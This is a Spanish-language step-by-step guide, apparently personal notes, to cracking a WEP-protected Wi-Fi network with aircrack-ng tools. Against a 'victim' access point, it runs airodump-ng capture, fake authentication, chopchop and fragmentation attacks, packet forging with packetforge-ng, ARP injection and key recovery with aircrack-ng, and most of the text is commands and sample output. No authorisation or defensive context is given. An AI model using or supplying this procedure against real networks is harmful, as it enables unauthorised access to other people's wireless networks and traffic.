aircrack
(Las opciones que pongo entre comillas han de ir sin ellas al escribir
el comando)
a)
Terminal 1:
Levantar el interface y lanzar airodump. Las capturas se guardan en el
fichero "capt"

sudo ifconfig rausb0 up
sudo airodump-ng -w capt rausb0

(capt es el nombre del archivo con extensión .cap donde se almacenarán
las capturas)

Seleccionar una victima y volver a lanzar airodump en el canal de ésta:
sudo airodump-ng -w capt --channel "nº de canal victima" rausb0

b)
Terminal 2:
Autentificarse en el AP de la victima:

sudo aireplay-ng -1 0 -a "mac_victima" rausb0

00:06:15  Sending Authentication Request (Open System)
00:06:15  Authentication successful
00:06:15  Sending Association Request
00:06:15  Association successful :-)

c)
Terminal 3:
Lanzar ataque 4 y esperar a ver si el AP escupe algun paquete xor

sudo aireplay -4 -a "mac_victima" -h "mi_mac" rausb0

Cuando aparezca un paquete saldrá algo así:

Read 8 packets...

       Size: 72, FromDS: 1, ToDS: 0 (WEP)

             BSSID  =  00:01:38:CF:91:BB
         Dest. MAC  =  01:00:5E:00:00:01
        Source MAC  =  00:01:38:CF:60:94

       0x0000:  0842 0000 0100 5e00 0001 0001 38cf 91bb
B....^.....8...
       0x0010:  0001 38cf 6094 8062 cc21 2200 1f62 b372
.8.`..b.!"..b.r
       0x0020:  723b 5d37 4610 4fea b0da 6414 2d90 aaa3
r;]7F.O...d.-...
       0x0030:  a096 ab28 7832 c214 85bb 9c73 a4bb 5406
..(x2.....s..T.
       0x0040:  4876 be5f 2826 68cd                      Hv._(&h.

Use this packet ?

Contestar "y"

Si no pilla un xor lanzar el ataque 5:
(si lo pilla pasar al punto d)

aireplay-ng -5 -b  "mac_victima" -h "mi_mac" rausb0

0x0000:  0842 0000 0100 5e00 0001 0001 38ca baa7  .B....^.....8...
       0x0010:  0001 38ca 345f 0047 8d6d 3600 4d18 2b8d
.8.4_.G.m6.M.+.
       0x0020:  0e5f 3441 8aed 611c 86a6 e341 4acd 8709
_4A..a....AJ...
       0x0030:  dbef 4828 6440 a30a 95a1 79aa eafe 9ce4
.H([email protected].....
       0x0040:  817e 106c 1db8 7717                      .~.l..w.

Use this packet ?  ( contestar "y" )

Saving chosen packet in replay_src-0101-001954.cap
00:20:44  Data packet found!
00:20:44  Sending fragmented packet
00:20:44  Got RELAYED packet!!
00:20:44  Trying to get 384 bytes of a keystream
00:20:44  Got RELAYED packet!!
00:20:44  Trying to get 1500 bytes of a keystream
00:20:44  Got RELAYED packet!!
Saving keystream in fragment-0101-002044.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes
keystream

d)
Ahora hay que crear un paquete para inyectar, usando el archivo
fragment....xor:

packetforge-ng -0 -a "mac_victima"  -h "mi_mac" -k 192.168.1.100 -l
192.168.1.1 -y fragment-0101-002044.xor -w arp

Si está bien el comando saldra: Wrote packet  to: arp

Las opciones -l y -k no sé si son necesarias
-y "nombre del paqute xorg guardado anteriormente"
-w "nombre que le vayamos a dar al paquete para inyectar"

e)
Ahora toca inyectar el paquete:

aireplay-ng -2 -r arp rausb0

Size: 68, FromDS: 0, ToDS: 1 (WEP)

             BSSID  =  00:01:38:CA:BA:A7
         Dest. MAC  =  FF:FF:FF:FF:FF:FF
        Source MAC  =  00:18:84:80:2C:A5

       0x0000:  0841 0201 0001 38ca baa7 0018 8480 2ca5
A....8.......,.
       0x0010:  ffff ffff ffff 8001 a26d 3600 66e5 0fb1
........m6.f...
       0x0020:  1a22 9b19 fceb b86f 1bec aa21 69f0 5fff
".....o...!i._.
       0x0030:  d2f8 af41 9e41 8b41 fe73 40df e1a5 3ac6
..A.A.A.s@...:.
       0x0040:  cc17 5784                                ..W.

Use this packet ? ( Contestar "y" )

Saving chosen packet in replay_src-0101-002626.cap


Y los data en airodump empiezan a subir a toda velocidad.

f)
Cuando el número de paquetes ronde los 40.000 lanzamos desde otro
terminal:

aircrack-ng capt.cap
o bien
aircrack-ptw capt.cap

(En realidad el archivo de capturas tendrá la forma: capt-01.cap)
Si no pasa nada es que son aún pocos los paquetes capturados, esperamos
a que aumenten y se repite la operación hasta que escupa la clave wep.